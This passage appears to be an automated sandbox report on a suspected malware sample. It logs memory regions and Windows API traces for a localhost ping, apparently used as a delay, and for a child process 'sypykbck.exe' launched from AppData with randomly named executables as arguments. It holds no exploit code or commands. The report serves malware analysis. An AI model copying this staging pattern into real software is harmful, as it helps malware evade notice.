region_type = private name = "private_0x0000000001510000" filename = "" Region: id = 1587 start_va = 0x1570000 end_va = 0x15affff entry_point = 0x0 region_type = private name = "private_0x0000000001570000" filename = "" Region: id = 1588 start_va = 0x1640000 end_va = 0x167ffff entry_point = 0x0 region_type = private name = "private_0x0000000001640000" filename = "" Region: id = 1589 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1590 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 1591 start_va = 0x736b0000 end_va = 0x736e7fff entry_point = 0x736b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 1592 start_va = 0x1680000 end_va = 0x180ffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 1633 start_va = 0x1420000 end_va = 0x145ffff entry_point = 0x0 region_type = private name = "private_0x0000000001420000" filename = "" Region: id = 1634 start_va = 0x14d0000 end_va = 0x150ffff entry_point = 0x0 region_type = private name = "private_0x00000000014d0000" filename = "" Region: id = 1635 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1660 start_va = 0x1600000 end_va = 0x163ffff entry_point = 0x0 region_type = private name = "private_0x0000000001600000" filename = "" Region: id = 1661 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Thread: id = 32 os_tid = 0xc00 [0099.195] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f954 | out: lpSystemTimeAsFileTime=0x22f954*(dwLowDateTime=0x79229820, dwHighDateTime=0x1d440a9)) [0099.195] GetCurrentProcessId () returned 0xbfc [0099.195] GetCurrentThreadId () returned 0xc00 [0099.195] GetTickCount () returned 0x23b1c [0099.195] QueryPerformanceCounter (in: lpPerformanceCount=0x22f94c | out: lpPerformanceCount=0x22f94c*=15598383572) returned 1 [0099.195] GetModuleHandleA (lpModuleName=0x0) returned 0x1c0000 [0099.195] __set_app_type (_Type=0x1) [0099.195] __p__fmode () returned 0x76b331f4 [0099.195] __p__commode () returned 0x76b331fc [0099.195] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1c2ae1) returned 0x0 [0099.195] __getmainargs (in: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8, _DoWildCard=0, _StartInfo=0x1c50e8 | out: _Argc=0x1c50d4, _Argv=0x1c50dc, _Env=0x1c50d8) returned 0 [0099.195] SetThreadUILanguage (LangId=0x0) returned 0x409 [0099.196] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.196] WSAStartup (in: wVersionRequired=0x2, lpWSAData=0x1c5440 | out: lpWSAData=0x1c5440) returned 0 [0099.201] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\Tcpip\\Parameters", ulOptions=0x0, samDesired=0x1, phkResult=0x22f3e4 | out: phkResult=0x22f3e4*=0x58) returned 0x0 [0099.201] RegQueryValueExA (in: hKey=0x58, lpValueName="DefaultTTL", lpReserved=0x0, lpType=0x22f3d8, lpData=0x22f3e0, lpcbData=0x22f3dc*=0x4 | out: lpType=0x22f3d8*=0x0, lpData=0x22f3e0*=0x0, lpcbData=0x22f3dc*=0x4) returned 0x2 [0099.201] RegCloseKey (hKey=0x58) returned 0x0 [0099.201] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f3ac*(ai_flags=4, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f3d4 | out: ppResult=0x22f3d4*=0x0) returned 11001 [0099.201] getaddrinfo (in: pNodeName="localhost", pServiceName=0x0, pHints=0x22f3ac*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x22f3d4 | out: ppResult=0x22f3d4*=0x2e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="cRh2YWu7", ai_addr=0x2e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) returned 0 [0099.913] FreeAddrInfoW (pAddrInfo=0x2e46f0*(ai_flags=0, ai_family=23, ai_socktype=0, ai_protocol=0, ai_addrlen=0x1c, ai_canonname="剣㉨坙㝵", ai_addr=0x2e47b8*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), ai_next=0x2e47e0*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2e3a18*(sa_family=2, sin_port=0x0, sin_addr="127.0.0.1"), ai_next=0x0))) [0099.913] Icmp6CreateFile () returned 0x2e8b40 [0100.103] LocalAlloc (uFlags=0x0, uBytes=0x20) returned 0x2e4830 [0100.103] LocalAlloc (uFlags=0x0, uBytes=0x1ff8) returned 0x2eebb0 [0100.103] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.103] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2720, dwLanguageId=0x0, lpBuffer=0x22f3d4, nSize=0x0, Arguments=0x22f3d0 | out: lpBuffer="XH.") returned 0x19 [0100.104] CharToOemBuffA (in: lpszSrc="\r\nPinging cRh2YWu7 [::1] ", lpszDst=0x2e4858, cchDstLength=0x19 | out: lpszDst="\r\nPinging cRh2YWu7 [::1] ") returned 1 [0100.104] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.104] _write (in: _FileHandle=1, _Buf=0x2e4858*, _MaxCharCount=0x19 | out: _Buf=0x2e4858*) returned 25 [0100.104] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.104] LocalFree (hMem=0x2e4858) returned 0x0 [0100.104] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x275a, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer="XH.") returned 0x18 [0100.104] CharToOemBuffA (in: lpszSrc="with 32 bytes of data:\r\n", lpszDst=0x2e4858, cchDstLength=0x18 | out: lpszDst="with 32 bytes of data:\r\n") returned 1 [0100.104] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.104] _write (in: _FileHandle=1, _Buf=0x2e4858*, _MaxCharCount=0x18 | out: _Buf=0x2e4858*) returned 24 [0100.105] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.105] LocalFree (hMem=0x2e4858) returned 0x0 [0100.105] SetConsoleCtrlHandler (HandlerRoutine=0x1c17ca, Add=1) returned 1 [0100.105] Icmp6SendEcho2 (in: IcmpHandle=0x2e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f450, DestinationAddress=0x1c55e0, RequestData=0x2e4830, RequestSize=0x20, RequestOptions=0x22f400, ReplyBuffer=0x2eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2eebb0) returned 0x1 [0100.106] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0100.106] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer=" Q.") returned 0x10 [0100.106] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0100.106] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.106] _write (in: _FileHandle=1, _Buf=0x2e5120*, _MaxCharCount=0x10 | out: _Buf=0x2e5120*) returned 16 [0100.106] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.107] LocalFree (hMem=0x2e5120) returned 0x0 [0100.107] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer="\x10<.") returned 0x9 [0100.107] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0100.107] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.107] _write (in: _FileHandle=1, _Buf=0x2e3c10*, _MaxCharCount=0x9 | out: _Buf=0x2e3c10*) returned 9 [0100.107] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.107] LocalFree (hMem=0x2e3c10) returned 0x0 [0100.107] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer=" \x8f.") returned 0x2 [0100.107] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0100.107] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0100.107] _write (in: _FileHandle=1, _Buf=0x2e8f20*, _MaxCharCount=0x2 | out: _Buf=0x2e8f20*) returned 2 [0100.107] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0100.107] LocalFree (hMem=0x2e8f20) returned 0x0 [0100.107] Sleep (dwMilliseconds=0x3e8) [0101.177] Icmp6SendEcho2 (in: IcmpHandle=0x2e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f450, DestinationAddress=0x1c55e0, RequestData=0x2e4830, RequestSize=0x20, RequestOptions=0x22f400, ReplyBuffer=0x2eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2eebb0) returned 0x1 [0101.347] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0101.347] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer=" Q.") returned 0x10 [0101.348] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0101.348] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.348] _write (in: _FileHandle=1, _Buf=0x2e5120*, _MaxCharCount=0x10 | out: _Buf=0x2e5120*) returned 16 [0101.348] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.348] LocalFree (hMem=0x2e5120) returned 0x0 [0101.348] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2727, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer="\x10<.") returned 0x9 [0101.348] CharToOemBuffA (in: lpszSrc="time<1ms ", lpszDst=0x2e3c10, cchDstLength=0x9 | out: lpszDst="time<1ms ") returned 1 [0101.348] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.348] _write (in: _FileHandle=1, _Buf=0x2e3c10*, _MaxCharCount=0x9 | out: _Buf=0x2e3c10*) returned 9 [0101.348] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.348] LocalFree (hMem=0x2e3c10) returned 0x0 [0101.348] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer=" \x8f.") returned 0x2 [0101.348] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0101.348] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0101.348] _write (in: _FileHandle=1, _Buf=0x2e8f20*, _MaxCharCount=0x2 | out: _Buf=0x2e8f20*) returned 2 [0101.348] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0101.348] LocalFree (hMem=0x2e8f20) returned 0x0 [0101.348] Sleep (dwMilliseconds=0x3e8) [0102.393] Icmp6SendEcho2 (in: IcmpHandle=0x2e8b40, Event=0x0, ApcRoutine=0x0, ApcContext=0x0, SourceAddress=0x22f450, DestinationAddress=0x1c55e0, RequestData=0x2e4830, RequestSize=0x20, RequestOptions=0x22f400, ReplyBuffer=0x2eebb0, ReplySize=0x1ff8, Timeout=0xfa0 | out: ReplyBuffer=0x2eebb0) returned 0x1 [0102.565] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f8d4, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.565] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2723, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer=" Q.") returned 0x10 [0102.565] CharToOemBuffA (in: lpszSrc="Reply from ::1: ", lpszDst=0x2e5120, cchDstLength=0x10 | out: lpszDst="Reply from ::1: ") returned 1 [0102.565] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.565] _write (in: _FileHandle=1, _Buf=0x2e5120*, _MaxCharCount=0x10 | out: _Buf=0x2e5120*) returned 16 [0102.565] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.565] LocalFree (hMem=0x2e5120) returned 0x0 [0102.565] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2726, dwLanguageId=0x0, lpBuffer=0x22f3d8, nSize=0x0, Arguments=0x22f3d4 | out: lpBuffer="\x10<.") returned 0x9 [0102.565] CharToOemBuffA (in: lpszSrc="time=5ms ", lpszDst=0x2e3c10, cchDstLength=0x9 | out: lpszDst="time=5ms ") returned 1 [0102.565] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.565] _write (in: _FileHandle=1, _Buf=0x2e3c10*, _MaxCharCount=0x9 | out: _Buf=0x2e3c10*) returned 9 [0102.565] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.565] LocalFree (hMem=0x2e3c10) returned 0x0 [0102.565] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x273f, dwLanguageId=0x0, lpBuffer=0x22f3dc, nSize=0x0, Arguments=0x22f3d8 | out: lpBuffer=" \x8f.") returned 0x2 [0102.565] CharToOemBuffA (in: lpszSrc="\r\n", lpszDst=0x2e8f20, cchDstLength=0x2 | out: lpszDst="\r\n") returned 1 [0102.565] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.565] _write (in: _FileHandle=1, _Buf=0x2e8f20*, _MaxCharCount=0x2 | out: _Buf=0x2e8f20*) returned 2 [0102.566] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.566] LocalFree (hMem=0x2e8f20) returned 0x0 [0102.566] getnameinfo (in: pSockaddr=0x1c55e0*(sa_family=23, sin6_port=0x0, sin6_flowinfo=0x0, sin6_addr="0000:0000:0000:0000:0000:0000:0000:0001", sin6_scope_id=0x0), SockaddrLength=0x1c, pNodeBuffer=0x22f3a0, NodeBufferSize=0x41, pServiceBuffer=0x0, ServiceBufferSize=0x0, Flags=2 | out: pNodeBuffer="::1", pServiceBuffer=0x0) returned 0 [0102.566] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x274f, dwLanguageId=0x0, lpBuffer=0x22f370, nSize=0x0, Arguments=0x22f36c | out: lpBuffer="\xd0\x14\x2f") returned 0x56 [0102.566] CharToOemBuffA (in: lpszSrc="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n", lpszDst=0x2f14d0, cchDstLength=0x56 | out: lpszDst="\r\nPing statistics for ::1:\r\n Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),\r\n") returned 1 [0102.566] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.566] _write (in: _FileHandle=1, _Buf=0x2f14d0*, _MaxCharCount=0x56 | out: _Buf=0x2f14d0*) returned 86 [0102.566] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.566] LocalFree (hMem=0x2f14d0) returned 0x0 [0102.566] FormatMessageA (in: dwFlags=0x900, lpSource=0x0, dwMessageId=0x2753, dwLanguageId=0x0, lpBuffer=0x22f380, nSize=0x0, Arguments=0x22f37c | out: lpBuffer="\xe8\x14\x2f") returned 0x61 [0102.566] CharToOemBuffA (in: lpszSrc="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 5ms, Average = 1ms\r\n", lpszDst=0x2f14e8, cchDstLength=0x61 | out: lpszDst="Approximate round trip times in milli-seconds:\r\n Minimum = 0ms, Maximum = 5ms, Average = 1ms\r\n") returned 1 [0102.566] _setmode (_FileHandle=1, _Mode=32768) returned 16384 [0102.566] _write (in: _FileHandle=1, _Buf=0x2f14e8*, _MaxCharCount=0x61 | out: _Buf=0x2f14e8*) returned 97 [0102.566] _setmode (_FileHandle=1, _Mode=16384) returned 32768 [0102.566] LocalFree (hMem=0x2f14e8) returned 0x0 [0102.566] IcmpCloseHandle (IcmpHandle=0x2e8b40) returned 1 [0102.753] LocalFree (hMem=0x2e4830) returned 0x0 [0102.753] LocalFree (hMem=0x2eebb0) returned 0x0 [0102.753] WSACleanup () returned 0 [0102.908] exit (_Code=0) Thread: id = 35 os_tid = 0xc20 Thread: id = 37 os_tid = 0xc30 Thread: id = 38 os_tid = 0xc34 Process: id = "24" image_name = "sypykbck.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe" page_root = "0x7ea16940" os_pid = "0xc0c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xb68" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1527 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1528 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1529 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 1530 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "sypykbck.exe" filename = "\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\micros~1\\sypykbck.exe") Region: id = 1531 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1532 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1533 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1534 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1535 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1536 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1537 start_va = 0x180000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 1538 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1539 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1540 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1541 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1542 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1543 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1544 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1545 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1546 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1547 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1548 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 1549 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1550 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1582 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1583 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1584 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1585 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 1586 start_va = 0x11a0000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1662 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1663 start_va = 0x11a0000 end_va = 0x125ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1664 start_va = 0x1390000 end_va = 0x139ffff entry_point = 0x0 region_type = private name = "private_0x0000000001390000" filename = "" Region: id = 1710 start_va = 0x1260000 end_va = 0x133efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001260000" filename = "" Region: id = 1711 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 1712 start_va = 0x150000 end_va = 0x152fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 1713 start_va = 0x150000 end_va = 0x150fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Thread: id = 33 os_tid = 0xc10 [0099.362] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x793a65e0, dwHighDateTime=0x1d440a9)) [0099.362] GetCurrentProcessId () returned 0xc0c [0099.362] GetCurrentThreadId () returned 0xc10 [0099.362] GetTickCount () returned 0x23bb8 [0099.362] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15615159413) returned 1 [0099.363] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0099.363] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.363] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0099.363] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0099.363] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0099.363] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0099.364] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0099.365] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0099.365] GetCurrentThreadId () returned 0xc10 [0099.365] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\EEBsYm5\\AppData\\Local\\MICROS~1\\Sypykbck.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\LSfkRHur.exe\" 2", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, 